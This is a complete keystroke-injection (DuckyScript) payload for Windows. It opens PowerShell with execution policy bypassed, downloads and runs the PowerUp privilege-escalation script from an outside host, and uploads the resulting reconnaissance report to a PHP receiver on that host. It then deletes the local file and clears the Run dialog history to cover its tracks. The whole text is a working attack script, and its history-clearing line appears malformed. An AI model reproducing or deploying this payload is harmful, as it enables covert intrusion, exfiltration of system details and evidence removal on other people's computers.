DELAY 1000
GUI r
DELAY 1000
STRING powershell -nop -exec bypass 
DELAY 600
ENTER
DELAY 4000
STRING IEX (New-Object Net.WebClient).DownloadString('https://www.ihack.eu/files/PowerUp.ps1'); Invoke-AllChecks | Out-File -Encoding ASCII $env:TEMP\checks.txt
DELAY 1000
ENTER
DELAY 1000
STRING $content = (gc -Path $env:TEMP\checks.txt | out-string); (New-Object Net.WebClient).UploadString('http://www.ihack.eu/files/rx.php', $content)
DELAY 300
ENTER
REM Delete checks.txt file
STRING del $env:TEMP\checks.txt
ENTER
DELAY 600
REM Clear the Run history and exit
STRING "Remove-ItemProperty -Path 'HKCU:SoftwareMicrosoftWindowsCurrentVersionExplorerRunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
STRING exit
ENTER
DELAY 1000
STRING exit
ENTER